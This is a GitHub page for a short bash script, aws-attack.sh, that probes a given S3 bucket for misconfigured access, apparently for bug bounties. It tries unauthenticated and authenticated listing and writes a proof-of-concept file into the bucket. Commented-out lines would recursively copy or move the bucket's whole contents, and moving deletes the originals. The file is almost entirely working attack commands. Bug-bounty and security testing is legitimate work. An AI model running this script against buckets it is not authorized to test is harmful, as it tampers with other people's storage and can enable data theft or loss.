-
Notifications
You must be signed in to change notification settings - Fork 14
/
Copy pathaws-attack.sh
executable file
·33 lines (25 loc) · 1.15 KB
/
aws-attack.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#!/bin/bash
if ! [[ ${1} ]];then
echo -e "\n[!]\tUsage : ./aws-attack.sh S3_Bucket_Name\n"
exit
fi
echo -e "\n[+] Trying unauthenticated listing\n"
aws s3 ls s3://"${1}"
#echo -e "\n[+] Trying unauthenticated read\n"
#aws s3 --no-sign-request --recursive cp s3://"${1}"/ ${1}
#aws s3 --no-sign-request --recursive mv s3://"${1}"/ ${1}
echo -e "\n[+] Trying unauthenticated write\n"
echo "Uploaded by bug_bunny as a PoC for bounty" > test.txt
aws s3 --no-sign-request cp test.txt s3://"${1}"/Just_A_Test.txt
echo "Uploaded by bug_bunny as a PoC for bounty" > test.txt
aws s3 --no-sign-request mv test.txt s3://"${1}"/Just_A_Test.txt
echo -e "\n[+] Trying authenticated listing\n"
aws s3 --profile myprofile ls s3://"${1}"
#echo -e "\n[+] Trying authenticated read\n"
#aws s3 --profile myprofile cp s3://"${1}"/ ${1}
#aws s3 --profile myprofile mv s3://"${1}"/ ${1}
echo -e "\n[+] Trying authenticated write\n"
echo "Uploaded by bug_bunny as a PoC for bounty" > test.txt
aws s3 --profile myprofile cp test.txt s3://"${1}"/Just_A_Test.txt
echo "Uploaded by bug_bunny as a PoC for bounty" > test.txt
aws s3 --profile myprofile mv test.txt s3://"${1}"/Just_A_Test.txt